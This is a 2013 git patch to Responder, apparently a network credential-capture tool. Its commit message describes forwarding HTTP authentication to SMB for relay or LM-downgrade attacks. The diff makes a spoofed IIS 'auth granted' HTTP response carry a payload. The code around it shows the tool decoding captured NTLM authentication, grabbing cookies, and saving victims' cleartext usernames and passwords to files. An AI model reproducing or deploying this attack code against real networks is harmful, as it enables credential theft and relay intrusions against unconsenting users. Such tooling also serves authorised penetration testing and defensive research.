From 0fcaa68c074e496edb2164ca35659ff636b5a361 Mon Sep 17 00:00:00 2001 From: Lgandx Date: Wed, 12 Jun 2013 12:12:14 -0400 Subject: [PATCH] added: HTTP auth forward to SMB. This is useful for SMB Relay or LM downgrade from HTTP NTLM ESS to SMB LM. --- HTTPPackets.py | 8 ++++++-- Responder.py | 11 +++++++---- 2 files changed, 13 insertions(+), 6 deletions(-) diff --git a/HTTPPackets.py b/HTTPPackets.py index 1b560a7..2b778f4 100644 --- a/HTTPPackets.py +++ b/HTTPPackets.py @@ -56,9 +56,13 @@ class IIS_Auth_Granted(Packet): ("Type", "Content-Type: text/html\r\n"), ("WWW-Auth", "WWW-Authenticate: NTLM\r\n"), ("PoweredBy", "X-Powered-By: ASP.NET\r\n"), - ("Len", "Content-Length: 0\r\n"), - ("CRLF", "\r\n"), + ("ContentLen", "Content-Length: "), + ("ActualLen", "76"), + ("CRLF", "\r\n\r\n"), + ("Payload", "\n\n\n\nLoading\n\n\n"), ]) + def calculate(self): + self.fields["ActualLen"] = len(str(self.fields["Payload"])) #HTTP NTLM Auth class NTLM_Challenge(Packet): diff --git a/Responder.py b/Responder.py index 4f99eaa..ba3680f 100644 --- a/Responder.py +++ b/Responder.py @@ -907,16 +907,18 @@ def PacketSequence(data,client): if packetNtlm == "\x03": NTLM_Auth= b64decode(''.join(a)) ParseHTTPHash(NTLM_Auth,client) - buffer1 = str(IIS_Auth_Granted()) - return buffer1 + buffer1 = IIS_Auth_Granted() + buffer1.calculate() + return str(buffer1) if b: GrabCookie(data,client) outfile = "HTTP-Clear-Text-Password-"+client+".txt" WriteData(outfile,b64decode(''.join(b)), b64decode(''.join(b))) print "[+]HTTP-User & Password:", b64decode(''.join(b)) logging.warning('[+]HTTP-User & Password: %s'%(b64decode(''.join(b)))) - buffer1 = str(IIS_Auth_Granted()) - return buffer1 + buffer1 = IIS_Auth_Granted() + buffer1.calculate() + return str(buffer1) else: return str(Basic_Ntlm(Basic)) @@ -1432,3 +1434,4 @@ if __name__ == '__main__': raw_input() +